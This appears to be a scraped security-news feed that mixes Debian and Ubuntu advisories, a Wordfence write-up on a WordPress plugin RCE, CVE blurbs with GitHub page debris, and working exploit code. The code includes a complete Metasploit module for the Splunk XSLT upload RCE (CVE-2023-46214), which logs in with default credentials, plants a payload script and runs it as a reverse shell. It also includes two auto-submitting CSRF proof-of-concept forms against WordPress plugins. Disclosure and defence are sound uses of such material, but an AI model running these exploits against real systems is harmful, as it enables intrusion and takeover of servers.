Debian Linux Security Advisory 5575-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5575-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
December 11, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42916 CVE-2023-42917

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42916

    Clement Lecigne discovered that processing web content may  
    disclose sensitive information. Apple is aware of a report that  
    this issue may have been actively exploited.

CVE-2023-42917

    Clement Lecigne discovered that processing web content may lead to  
    arbitrary code execution. Apple is aware of a report that this  
    issue may have been actively exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.3-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.3-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmV3hxQACgkQAAyEYu0C  
2ALD/A/+Inn3pEr29SXRWDWhmX/eUIg1KrUVGXXfgrWFaDx9ejRhchXnzORIOKcV  
a1SlXQ48Gixernf8T06Hbvg6l3TL8vd+Z/mNO+oVYvT3h/ARiJ6rtAS+rxjpFrF0  
GOGBDUh8X69knZ17ZZ4fuMo4dkGvq75Ww95bS70ffLWGcwvDjL0VYU1Igkcf8DAU  
moqWeHGH1dPwQs18Ifa5PWCnBoxyBkeu3sQz1qsZQ4h628Feo1k7orjRiL7NDS9t  
bfSZyiR935BmrOqbGZ1Mg8UH26qY9WZkARUEmi5kfHeycXvAs80sKW6AzKJtksa/  
nidSAmYU9QTI5pHp4oF4hSlG7GSABQhSBEzx/B2449XvQOvoD0EAt7OKvEFZ7fIL  
mHDLBl4K9QOErM7Qu2hWqaqEBnxo8Xb8epKFtqQUUqVpBPdc79UtrwNj2Lvg5/w3  
TPqBc/OnYuXRuTlAZ85zAqbus6roCQI2Nwe6m8+lVhK1H4wRSGQ3XvzpGMG9bplq  
y9Z7Lwg2b8s9+3Kfkm8fO9qsK0TrrODxBoJ/hvWZ0ULtvY3KzREnEpnKkPmPdtod  
InJwL6vQbtR9D9Zcss8+pWm/ElD5ImTekoqs5vHrgFaXLH0iI/lAXPm/DFX5R5cW  
SR6mK0T1Dwg5GveQlnVR7nbwYCtjZOPHGPKDUQYzaNf14keKk9A=  
=v8r9  
-----END PGP SIGNATURE-----

Debian Security Advisory 5575-1

This Metasploit module exploits a remote code execution vulnerability in Splunk Enterprise. The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid credentials, typically admin:changeme by default. The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the runshellscript capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides the attacker with remote control over the compromised Splunk instance. The module is designed to work seamlessly, ensuring successful exploitation under the right conditions.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Splunk Authenticated XSLT Upload RCE',        'Description' => %q{          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.          The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages          a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid          credentials, typically 'admin:changeme' by default.          The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the          vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript'          capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides          the attacker with remote control over the compromised Splunk instance. The module is designed to work          seamlessly, ensuring successful exploitation under the right conditions.        },        'Author' => [          'nathan', # Writeup and PoC          'Valentin Lobstein', # Metasploit module          'h00die', # Assistance in module development        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-46214'],          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],          ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory          ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup        ],        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [['Automatic', {}]],        'DisclosureDate' => '2023-11-28',        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8000        },        'Privileged' => false,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),        OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),        OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]),      ]    )  end  def exploit    cookie_string ||= authenticate    unless cookie_string      fail_with(Failure::NoAccess, 'Authentication failed')    end    sleep(0.3)    csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)    unless csrf_token      fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')    end    sleep(0.3)    malicious_xsl = generate_malicious_xsl    text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)    unless text_value      fail_with(Failure::Unknown, 'File upload failed')    end    sleep(0.3)    jsid = get_job_search_id(csrf_token, updated_cookie_string)    unless jsid      fail_with(Failure::Unknown, 'Creating job failed')    end    sleep(0.3)    unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)      fail_with(Failure::Unknown, 'XSLT Transform failed')    end    sleep(0.3)    unless trigger_payload(jsid, csrf_token, updated_cookie_string)      fail_with(Failure::Unknown, 'Failed to execute reverse shell')    end  end  def check    unless splunk?      return CheckCode::Unknown('Target does not appear to be a Splunk instance')    end    begin      cookie_string = authenticate    rescue RuntimeError      cookie_string = nil    end    unless cookie_string      return CheckCode::Detected('The target is Splunk but authentication failed')    end    version = get_version_authenticated(cookie_string)    return CheckCode::Detected('Unable to determine Splunk version') unless version    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))      return CheckCode::Appears("Exploitable version found: #{version}")    end    CheckCode::Safe("Non-vulnerable version found: #{version}")  end  def trigger_payload(jsid, csrf_token, cookie_string)    return nil unless jsid && csrf_token    runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')    runshellscript_data = {      'search' => "|runshellscript \"#{datastore['RANDOM_FILENAME']}.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""    }    upload_headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    print_status("Executing payload at #{runshellscript_url}")    res = send_request_cgi(      'uri' => runshellscript_url,      'method' => 'POST',      'vars_post' => runshellscript_data,      'headers' => upload_headers    )    unless res      print_error('Failed to execute payload: No response received')      return nil    end    if res.code == 201      print_good('Payload executed successfully')      return true    end    print_error("Failed to execute payload: Server returned status code #{res.code}")    return nil  end  def trigger_xslt_transform(jsid, text_value, cookie_string)    return nil unless jsid && text_value    exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results')    exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/#{datastore['RANDOM_FILENAME']}.xsl"    xslt_headers = {      'X-Splunk-Module' => 'Splunk.Module.DispatchingModule',      'Connection' => 'close',      'Upgrade-Insecure-Requests' => '1',      'Accept-Language' => 'en-US,en;q=0.5',      'Accept-Encoding' => 'gzip, deflate',      'X-Requested-With' => 'XMLHttpRequest',      'Cookie' => cookie_string    }    print_status("Triggering XSLT transformation at #{exploit_endpoint}")    res = send_request_cgi(      'uri' => exploit_endpoint,      'method' => 'GET',      'headers' => xslt_headers    )    unless res      print_error('Failed to trigger XSLT transformation: No response received')      return nil    end    if res.code == 200      print_good('XSLT transformation triggered successfully')      return true    end    print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")    return nil  end  def generate_malicious_xsl    encoded_payload = Rex::Text.html_encode(payload.encoded)    xsl_template = <<~XSL      <?xml version="1.0" encoding="UTF-8"?>      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">        <xsl:template match="/">          <exsl:document href="/opt/splunk/bin/scripts/#{datastore['RANDOM_FILENAME']}.sh" method="text">            <xsl:text>#{encoded_payload}</xsl:text>          </exsl:document>        </xsl:template>      </xsl:stylesheet>    XSL    xsl_template  end  def get_job_search_id(csrf_token, cookie_string)    return nil unless csrf_token    jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')    upload_headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    jsid_data = {      'search' => '|search test|head 1'    }    print_status("Sending job search request to #{jsid_url}")    res = send_request_cgi(      'uri' => jsid_url,      'method' => 'POST',      'vars_post' => jsid_data,      'headers' => upload_headers,      'vars_get' => { 'output_mode' => 'json' }    )    unless res      print_error('Failed to initiate job search: No response received')      return nil    end    jsid = res.get_json_document['sid']    return jsid if jsid  end  def upload_malicious_file(file_content, csrf_token, cookie_string)    unless csrf_token      print_error('CSRF token not found')      return nil    end    post_data = Rex::MIME::Message.new    post_data.add_part(file_content, 'application/xslt+xml', nil, "form-data; name=\"spl-file\"; filename=\"#{datastore['RANDOM_FILENAME']}.xsl\"")    upload_headers = {      'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')    res = send_request_cgi(      'uri' => upload_url,      'method' => 'POST',      'data' => post_data.to_s,      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'headers' => upload_headers,      'vars_get' => {        'output_mode' => 'json',        'props.NO_BINARY_CHECK' => 1,        'input.path' => "#{datastore['RANDOM_FILENAME']}.xsl"      }    )    unless res      print_error('Malicious file upload failed: No response received')      return nil    end    if res.headers['Content-Type'].include?('application/json')      response_data = res.get_json_document    else      print_error('Response is not in JSON format')      return nil    end    if response_data.empty?      print_error('Failed to parse JSON or received empty JSON')      return nil    end    if response_data['messages'] && !response_data['messages'].empty?      text_value = response_data.dig('messages', 0, 'text')      if text_value.include?('concatenate')        print_error('Server responded with an error: concatenate found in the response')        return nil      end      print_good('Malicious file uploaded successfully')      return text_value    end    print_error('Server did not return a valid "messages" field')    return nil  end  def fetch_csrf_token(cookie_string)    print_status('Extracting CSRF token from cookies')    csrf_token_match = cookie_string.match(/splunkweb_csrf_token_8000=([^;]+)/)    if csrf_token_match      csrf_token = csrf_token_match[1]      print_good("CSRF token successfully extracted: #{csrf_token}")      en_us_url = normalize_uri(target_uri.path, 'en-US', 'app', 'launcher', 'home')      res = send_request_cgi({        'method' => 'GET',        'uri' => en_us_url,        'cookie' => cookie_string      })      updated_cookie_string = cookie_string      if res && res.code == 200        new_cookies = res.get_cookies        updated_cookie_string += new_cookies      end      return [csrf_token, updated_cookie_string]    end    fail_with(Failure::NotFound, 'CSRF token not found in cookies')  end  def get_version_authenticated(cookie_string)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),      'vars_get' => {        'output_mode' => 'json'      },      'headers' => {        'Cookie' => cookie_string      }    })    return nil unless res&.code == 200    body = res.get_json_document    Rex::Version.new(body.dig('generator', 'version'))  end  def splunk?    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/account/login')    })    return true if res&.body =~ /Splunk/    false  end  def authenticate    login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')    res = send_request_cgi({      'method' => 'GET',      'uri' => login_url    })    unless res      fail_with(Failure::Unreachable, 'No response received for authentication request')    end    cval_value = res.get_cookies.match(/cval=([^;]*)/)[1]    unless cval_value      fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')    end    auth_payload = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'cval' => cval_value,      'set_has_logged_in' => 'false'    }    res = send_request_cgi({      'method' => 'POST',      'uri' => login_url,      'cookie' => res.get_cookies,      'vars_post' => auth_payload    })    unless res && res.code == 200      fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')    end    print_good('Successfully authenticated on the Splunk instance')    res.get_cookies  endend

Splunk XSLT Upload Remote Code Execution

Ubuntu Security Notice 6550-1 - It was discovered that Smarty, that is integrated in the PostfixAdmin code, was not properly sanitizing user input when generating templates. An attacker could, through PHP injection, possibly use this issue to execute arbitrary code. It was discovered that Moment.js, that is integrated in the PostfixAdmin code, was using an inefficient parsing algorithm when processing date strings in the RFC 2822 standard. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6550-1December 12, 2023postfixadmin vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS (Available with Ubuntu Pro)- Ubuntu 20.04 LTS (Available with Ubuntu Pro)- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in PostfixAdmin.Software Description:- postfixadmin: Virtual mail hosting interface for PostfixDetails:It was discovered that Smarty, that is integrated in the PostfixAdmincode, was not properly sanitizing user input when generating templates. Anattacker could, through PHP injection, possibly use this issue to executearbitrary code. (CVE-2022-29221)It was discovered that Moment.js, that is integrated in the PostfixAdmincode, was using an inefficient parsing algorithm when processing datestrings in the RFC 2822 standard. An attacker could possibly use thisissue to cause a denial of service. (CVE-2022-31129)It was discovered that Smarty, that is integrated in the PostfixAdmincode, was not properly escaping JavaScript code. An attacker couldpossibly use this issue to conduct cross-site scripting attacks (XSS).(CVE-2023-28447)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS (Available with Ubuntu Pro):postfixadmin 3.3.10-2ubuntu0.1~esm1Ubuntu 20.04 LTS (Available with Ubuntu Pro):postfixadmin 3.2.1-3ubuntu0.1~esm1Ubuntu 18.04 LTS (Available with Ubuntu Pro):postfixadmin 3.0.2-2ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6550-1CVE-2022-29221, CVE-2022-31129, CVE-2023-28447

Ubuntu Security Notice USN-6550-1

WordPress Backup Migration plugin versions 1.3.7 and below suffer from a remote code execution vulnerability.

    Vulnerability Summary from Wordfence IntelligenceDescription: Backup Migration <= 1.3.7 backup-backup Unauthenticated Remote Code Execution Affected Plugin: Backup MigrationPlugin Slug: backup-backupAffected Versions: <= 1.3.7CVE ID:CVE-2023-6553Pending CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Nex Team Fully Patched Version: 1.3.8Bounty Award: $2,751.00The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.Technical AnalysisLine 118 within the /includes/backup-heart.php file used by the Backup Migration plugin attempts to include bypasser.php from the BMI_INCLUDES directory. The BMI_INCLUDES directory is defined by concatenating BMI_ROOT_DIR with the includes string on line 64. However, note that BMI_ROOT_DIR is defined via the content-dir HTTP header on line 62.affected_code_image_2 This means that the BMI_ROOT_DIR is user-controllable. By submitting a specially-crafted request, threat-actors can leverage this issue to include arbitrary, malicious PHP code and execute arbitrary commands on the underlying server in the security context of the WordPress instance.Disclosure TimelineDecember 5, 2023 – We receive the submission of the PHP Code Injection vulnerability in Backup Migration via the Wordfence Bug Bounty Program.December 6, 2023 – We validate the report and confirm the proof-of-concept exploit.December 6, 2023 – We initiate contact with the plugin developer and send over the full disclosure details. The vendor acknowledges the report and begins working on a fix. A fully patched version of the plugin, 1.3.8, is released.ConclusionIn this blog post, we detailed a critical PHP Code Injection vulnerability within the Backup Migration plugin affecting versions 1.3.7 and earlier. This vulnerability allows unauthenticated threat actors to inject arbitrary PHP code, resulting in a full site compromise. The vulnerability has been fully addressed in version 1.3.8 of the plugin.We urge WordPress users to verify that their sites are updated to the latest patched version of Backup Migration.Wordfence users running Wordfence Premium , Wordfence Care , and Wordfence Response  have been protected against these vulnerabilities as of December 6, 2023. Users still using the free version of Wordfence will receive the same protection on January 5, 2024.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

WordPress Backup Migration 1.3.7 Remote Code Execution

Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-41623: wuhaozhe-s-CVE/CVE-2023-41623 at main · GhostBalladw/wuhaozhe-s-CVE

XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-49490: XunRuiCMS-V4.5.5存在反射型XSS漏洞 · Issue #2 · dayrui/xunruicms

DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component select_media_post_wangEditor.php.

织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司

021-37788569

CVE-2023-49494: 织梦 (DedeCMS) 官方网站 - 内容管理系统

WordPress Contact Form to Any API plugin versions 1.1.6 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.6# Tested on: Windows, Linux# CVE: CVE-2023-47871# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.# Proof of Concept<html><body><form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST"><input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body></html># RecommendationUpgrade to version 1.1.7

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery

WordPress TextMe SMS plugin versions 1.9.0 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/textme-sms-integration/# Version: 1.9.0# Tested on: Windows, Linux# CVE: CVE-2023-48287# Product DescriptionThis plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.# Vulnerability overviewThe Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. # Proof of Concept<html>  <body>    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="tetxme_update_option_page" />      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html># RecommendationUpgrade to version 1.9.1

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.

Tag

#php